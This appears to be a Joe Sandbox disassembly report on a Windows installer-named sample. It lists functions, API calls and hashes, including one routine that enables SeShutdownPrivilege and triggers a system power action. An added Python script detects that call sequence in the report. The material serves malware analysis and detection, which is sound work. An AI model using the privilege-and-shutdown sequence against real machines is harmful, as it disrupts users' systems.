                                        • Instruction Fuzzy Hash: 6F3102749093808FD340DF28C19872EBBF0EB8A358F505A1DF8D986250E7789588CF43

                                         Control-flow Graph
                                         • Rendered graph not preserved; recoverable from the graph data: entry block 6c0dbc5e, WriteFile at 6c0dbd95 followed by GetLastError at 6c0dbdb9 on failure; error paths route through 6c0cf9df / 6c0cf9cc and __dosmaperr (6c0cf9f2).
                                        APIs
                                          • Part of subcall function 6C0DBEB1: GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                        • WriteFile.KERNEL32(?,?,6C0E46EC,00000000,00000000,?,00000000,00000000,6C0E5AB6,00000000,00000000,?,00000000,6C0DB0D0,6C0E46EC,00000000), ref: 6C0DBDAF
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0DBDB9
                                        • __dosmaperr.LIBCMT ref: 6C0DBDFE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 251514795-4022487301
                                        • Opcode ID: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                        • Instruction ID: 6e45ec93a3c751a8b5fc8aa818508e07b0289fd478fad7561c28b72f8184161c
                                        • Opcode Fuzzy Hash: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                        • Instruction Fuzzy Hash: 4F51C571A0030AAFDF019FA8C840BEEBBF9EF05358F560551E510A7A51DB70B945CBA1

                                        Control-flow Graph: rendered graph image omitted; function at 6C0C5B90-6C0C5D49, basic blocks marked Executed / Not Executed
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5D31
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 323602529-1866435925
                                        • Opcode ID: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                        • Instruction ID: 983d45d8af53bba410f8ff734203849c4d6d8c996710b88a30bb91d1233496ac
                                        • Opcode Fuzzy Hash: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                        • Instruction Fuzzy Hash: 565124B5600B008FD725CF29C495BA6BBF1FB48318F508A2DD89647B90D775B909CF91

                                        Control-flow Graph: rendered graph image omitted; function at 6C0DB925-6C0DB9C0, basic blocks marked Executed / Not Executed
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,6C0E425F), ref: 6C0DB97B
                                        • GetLastError.KERNEL32(?,00000000,?,6C0E425F), ref: 6C0DB985
                                        • __dosmaperr.LIBCMT ref: 6C0DB9B0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID:
                                        • API String ID: 2583163307-0
                                        • Opcode ID: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                        • Instruction ID: bc4c40d611272a1f64b0d0a304d7ea03436eaaa6075fb142002965c1c6ba4a66
                                        • Opcode Fuzzy Hash: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                        • Instruction Fuzzy Hash: F6014833A452A05AC201077AA845B9DA7E94F87B3CF2A4709E82587AC2CF60F885C290

                                        Control-flow Graph: rendered graph image omitted; function at 6C0D0B9C-6C0D0C12, basic blocks marked Executed / Not Executed
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction ID: 6da696bc5f27015316ce5573d13d56b6a4f9cc28bc80b1d3ffd870fe0d96020a
                                        • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction Fuzzy Hash: F0F0F4325097546AC6211B39AC00BDB36D89F4237CF231715E87893ED0DB70F40ACAE2
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AB4
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AF4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID:
                                        • API String ID: 323602529-0
                                        • Opcode ID: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                        • Instruction ID: d9b69faea24a0d0aa227bdb4362e91bb81dd11d9ba1effada35ab4dd24cb77dd
                                        • Opcode Fuzzy Hash: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                        • Instruction Fuzzy Hash: FC514975201B01DFD725CF25C485BE6BBF4FB08718F448A1CE8AA4B6A1DB34B549CB81
                                        APIs
                                        • GetLastError.KERNEL32(6C0F6DD8,0000000C), ref: 6C0CEF52
                                        • ExitThread.KERNEL32 ref: 6C0CEF59
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread
                                        • String ID:
                                        • API String ID: 1611280651-0
                                        • Opcode ID: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                        • Instruction ID: 7ff4d836846209e06997e57566a70cd09646bb0a13e0e9b1abeaac93bbe6340f
                                        • Opcode Fuzzy Hash: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                        • Instruction Fuzzy Hash: FAF0AFB1A00204AFDF009FB0D40ABAE3BF4FF41218F154649E42597B40CF34B946DBA2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                        • Instruction ID: daff465e35a268d62ad76ec9c3736a205e75f430edbca84598b2198dcc10689f
                                        • Opcode Fuzzy Hash: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                        • Instruction Fuzzy Hash: FD118871A0420EAFCF05CF58E945A9B3BF8EF48308F054069F808AB301D631EA11CBA4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction ID: 8fabd6d652315a8107c37655f75dd68ec912be72ba93f26020e9240a20051c05
                                        • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction Fuzzy Hash: F0012872C01159BFCF029FE88D00AEE7FF5AB08214F154165BD24A26A0E7319A24DB91
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                        • Instruction ID: 2dc6c3185138df8cb28b9d9f7cf74f0394906190dddd2fdd4614e9dda2622d7b
                                        • Opcode Fuzzy Hash: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                        • Instruction Fuzzy Hash: DAD06C3210010DBBDF028E84DD06EDA3BAAFB88714F014000BE1856020C732E861AB90
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction ID: dddcfcd49160081868d17e97d85d40bf85997d413c42dd535c0de8a6c7980fcf
                                        • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction Fuzzy Hash:
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: g)''
                                        • API String ID: 4218353326-3487984327
                                        • Opcode ID: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                        • Instruction ID: 2bcf0cab47e4c38dc211d182357c739ff517fabcb4c6f023be4e1d71f66b22f5
                                        • Opcode Fuzzy Hash: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                        • Instruction Fuzzy Hash: 4C630371744B018FC728CF28C4D0B99B7F3BF99318B598A6DC0A64BA55EB74B44ACB41
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 6C0C5D6A
                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0C5D76
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0C5D84
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0C5DAB
                                        • NtInitiatePowerAction.NTDLL ref: 6C0C5DBF
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3256374457-3733053543
                                        • Opcode ID: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                        • Instruction ID: 2d7dbaf430851fdc0995a43eb9cd0b488e557a340e54928b56817fff2bbce463
                                        • Opcode Fuzzy Hash: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                        • Instruction Fuzzy Hash: 34F0B470648300BBEA106B24DD0EB6A7FF4EF45701F014608F945A61C1D7746A84DB92
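The five calls listed for this function are the textbook way to enable SeShutdownPrivilege before shutting down or rebooting: the 0x28 passed to OpenProcessToken is TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, LookupPrivilegeValueW resolves the LUID for SeShutdownPrivilege, AdjustTokenPrivileges turns it on, and NtInitiatePowerAction is the native call behind the "Contains functionality to shutdown / reboot the system" signature. Two caveats for anyone reading this: SeShutdownPrivilege is held (disabled) by ordinary interactive users by default, so enabling it is not a privilege escalation in itself, and the argument values Joe Sandbox prints are stack snapshots in which "?" marks a value it could not resolve, so the AdjustTokenPrivileges arguments above should not be over-read. The script below is an added example, not Joe Sandbox code and not part of the analysed sample: it parses this report's API-list format, decodes the token access mask against the winnt.h TOKEN_* values, and flags the ordered sequence. The REPORT_APIS lines are copied from the listing above, BENIGN_APIS is a constructed negative case, and the POWER_ACTION_APIS set is the author's own choice.

```python
"""Spot the 'enable SeShutdownPrivilege, then trigger a power action' pattern
in a Joe Sandbox-style API listing.

Added example for this report, not Joe Sandbox code. REPORT_APIS is copied
from the listing above; BENIGN_APIS is constructed. TOKEN_* values come from
winnt.h; the sequence matcher and POWER_ACTION_APIS are the author's own.
"""
import re

# Token access rights from winnt.h. The report shows OpenProcessToken called
# with DesiredAccess = 0x28 = TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES.
TOKEN_ACCESS_RIGHTS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY",
    0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE",
    0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE",
    0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS",
    0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}

# APIs that shut down, reboot or change power state; all need SeShutdownPrivilege.
POWER_ACTION_APIS = {
    "NtInitiatePowerAction", "NtShutdownSystem", "ExitWindowsEx",
    "InitiateSystemShutdownW", "InitiateSystemShutdownExW", "InitiateShutdownW",
}

# One entry of the report's "APIs" list: "• Name.MODULE(args), ref: ADDR".
# GetCurrentProcess is listed without an argument list, so parentheses are optional.
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

REPORT_APIS = """
• GetCurrentProcess.KERNEL32 ref: 6C0C5D6A
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0C5D76
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0C5D84
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0C5DAB
• NtInitiatePowerAction.NTDLL ref: 6C0C5DBF
"""

# Constructed: a token query that never adjusts privileges or shuts down.
BENIGN_APIS = """
• GetCurrentProcess.KERNEL32 ref: 00401000
• OpenProcessToken.ADVAPI32(00000000,00000008), ref: 00401010
• GetTokenInformation.ADVAPI32(?,00000001,?,00000000,?), ref: 00401020
"""


def parse_api_lines(text):
    """Return one dict per API line: name, module, argument list, ref address."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"name": m.group("name"), "module": m.group("module"),
                      "args": args, "ref": m.group("ref")})
    return calls


def decode_access_mask(mask, table=TOKEN_ACCESS_RIGHTS):
    """Split an access mask into named flags; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    leftover = mask & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def find_shutdown_privilege_sequence(calls):
    """Match OpenProcessToken(TOKEN_ADJUST_PRIVILEGES) -> LookupPrivilegeValue*
    (SeShutdownPrivilege) -> AdjustTokenPrivileges -> a power-action API, in
    that order. Returns the evidence dict, or None if the chain is incomplete."""
    stage, evidence = 0, {}
    for call in calls:
        name = call["name"]
        if stage == 0 and name == "OpenProcessToken" and len(call["args"]) >= 2:
            try:
                rights = decode_access_mask(int(call["args"][1], 16))
            except ValueError:          # argument printed as '?' in the report
                continue
            if "TOKEN_ADJUST_PRIVILEGES" in rights:
                evidence["token_access"] = rights
                stage = 1
        elif stage == 1 and name.startswith("LookupPrivilegeValue") \
                and "SeShutdownPrivilege" in call["args"]:
            evidence["privilege"] = "SeShutdownPrivilege"
            stage = 2
        elif stage == 2 and name == "AdjustTokenPrivileges":
            stage = 3
        elif stage == 3 and name in POWER_ACTION_APIS:
            evidence["power_api"] = f"{name} @ {call['ref']}"
            return evidence
    return None


if __name__ == "__main__":
    print(find_shutdown_privilege_sequence(parse_api_lines(REPORT_APIS)))
    print(find_shutdown_privilege_sequence(parse_api_lines(BENIGN_APIS)))
```

The matcher is deliberately order-sensitive: a token opened with TOKEN_QUERY alone, or a LookupPrivilegeValueW for a different privilege, breaks the chain and yields None, which is what you want when triaging the many benign CRT and installer functions listed elsewhere in this report.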
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \j`7$\j`7$j
                                        • API String ID: 0-3644614255
                                        • Opcode ID: 1485219bad369f148596f4fd0062cee9e41f8338ed8c2eaa7fe012661e22ddba
                                        • Instruction ID: b9b1fa81de339f5179c902eda1ef04333d4fff0cbedc180aab6b5edc2f86519f
                                        • Opcode Fuzzy Hash: 1485219bad369f148596f4fd0062cee9e41f8338ed8c2eaa7fe012661e22ddba
                                        • Instruction Fuzzy Hash: 09422476A083828FCB14CF68C48066ABFE1ABCA354F14496EE4D5CB362D339D955CB53
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C1584B1
                                          • Part of subcall function 6C15993B: __EH_prolog.LIBCMT ref: 6C159940
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 1$`)K$h)K
                                        • API String ID: 3519838083-3935664338
                                        • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                        • Instruction ID: 3fa40a1cc2281ff3760e60aa400f189c9c1cf026fa14a38ab16d9cb7b032eaa7
                                        • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                        • Instruction Fuzzy Hash: C6F29DB0D00248DFDB11CFA8C894BDDBBB5AF59308F24409AD469AB781CB759E96CF11
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C14AEF4
                                          • Part of subcall function 6C14E622: __EH_prolog.LIBCMT ref: 6C14E627
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $h%K
                                        • API String ID: 3519838083-1737110039
                                        • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                        • Instruction ID: 5c5ba709fe016d722748af8b66f7e11955eb9573672f6daef16d09f070a295d2
                                        • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                        • Instruction Fuzzy Hash: DF537630901258DFDF15DFA8C994BEDBBB4AF19308F2480D8D45AA7691DB30AE89CF51
                                        APIs
